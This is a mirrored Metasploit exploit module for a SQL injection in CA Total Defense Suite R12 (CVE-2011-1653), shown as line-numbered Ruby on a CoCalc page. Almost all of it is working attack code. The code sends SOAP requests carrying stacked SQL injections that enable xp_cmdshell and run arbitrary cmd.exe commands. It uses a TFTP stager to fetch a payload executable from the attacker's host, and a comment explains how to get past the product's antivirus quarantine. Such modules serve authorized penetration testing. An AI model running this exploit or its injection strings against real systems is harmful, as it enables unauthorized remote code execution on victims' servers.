CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::CmdStager

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(update_info(info,

15
      'Name'           => 'CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection',

16
      'Description'    => %q{

17
          This module exploits a SQL injection flaw in CA Total Defense Suite R12.

18
        When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an

19
        attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql

20
        statements into the ReportIDs element.

21


22
      },

23
      'Author'         => [ 'MC' ],

24
      'License'        => MSF_LICENSE,

25
      'References'     =>

26
        [

27
          [ 'ZDI', '11-134' ],

28
          [ 'OSVDB', '74968'],

29
          [ 'CVE', '2011-1653' ],

30
        ],

31
      'Targets'	=>

32
        [

33
          [ 'Windows Universal',

34
            {

35
              'Arch' => ARCH_X86,

36
              'Platform' => 'win'

37
            }

38
          ]

39
        ],

40
      'CmdStagerFlavor' => 'tftp',

41
      'Privileged' => true,

42
      'Platform' => 'win',

43
      'DisclosureDate' => '2011-04-13',

44
      'DefaultTarget' => 0))

45


46
    register_options(

47
      [

48
        Opt::RPORT(34443),

49
        OptBool.new('SSL',   [ true, 'Use SSL', true ]),

50
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])

51
      ])

52
  end

53


54
  def windows_stager

55
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

56
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']

57
    execute_cmdstager({ temp: '.', tftphost: tftphost })

58
    @payload_exe = generate_payload_exe

59


60
    print_status("Attempting to execute the payload...")

61
    execute_command(@payload_exe)

62


63
  end

64


65
  def execute_command(cmd, opts = {})

66


67
    #	NOTE: This module was tested against the MS SQL Server 2005 Express bundled with

68
    #	CA Total Defense Suite R12. CA's Total Defense Suite real-time protection

69
    #	will quarantine the default framework executable payload. Choosing an alternate

70
    #	exe template will bypass the quarantine.

71


72
    inject = [

73
        "'') exec master.dbo.sp_configure 'show advanced options', 1;reconfigure;--",

74
        "'') exec master.dbo.sp_configure 'xp_cmdshell',1;reconfigure;--",

75
        "'') exec master.dbo.xp_cmdshell 'cmd.exe /c #{cmd}';--",

76
      ]

77


78
    inject.each do |sqli|

79


80
    soap = %Q|<?xml version="1.0" encoding="utf-8"?>

81
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">

82
  <soap12:Body>

83
    <reGenerateReports xmlns="http://tempuri.org/">

84
      <EnterpriseID>msf</EnterpriseID>

85
      <ReportIDs>#{sqli}</ReportIDs>

86
      <UserID>187</UserID>

87
    </reGenerateReports>

88
  </soap12:Body>

89
</soap12:Envelope>

90
    |

91


92
    res = send_request_cgi(

93
      {

94
        'uri'   =>  '/UNCWS/Management.asmx',

95
        'method' => 'POST',

96
        'version' => '1.0',

97
        'ctype' => 'application/soap+xml; charset=utf-8',

98
        'data' => soap,

99
      }, 5)

100


101
    if ( res and res.body =~ /SUCCESS/ )

102
        #print_good("Executing command...")

103
      else

104
        fail_with(Failure::Unknown, 'Something went wrong.')

105
      end

106
    end

107


108
  end

109


110
  def exploit

111


112
    unless datastore['CMD'].blank?

113
      print_status("Executing command '#{datastore['CMD']}'")

114
      execute_command(datastore['CMD'])

115
      return

116
    end

117


118
    case target['Platform']

119
      when 'win'

120
        windows_stager

121
      else

122
        fail_with(Failure::Unknown, 'Target not supported.')

123
    end

124


125
    handler

126


127
  end

128
end

129
__END__

130
POST /UNCWS/Management.asmx HTTP/1.1

131
Host: 192.168.31.129

132
Content-Type: application/soap+xml; charset=utf-8

133
Content-Length: length

134


135
<?xml version="1.0" encoding="utf-8"?>

136
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">

137
  <soap12:Body>

138
    <reGenerateReports xmlns="http://tempuri.org/">

139
      <EnterpriseID>string</EnterpriseID>

140
      <ReportIDs>string</ReportIDs>		<--boom!!

141
      <UserID>long</UserID>

142
    </reGenerateReports>

143
  </soap12:Body>

144
</soap12:Envelope>

145


146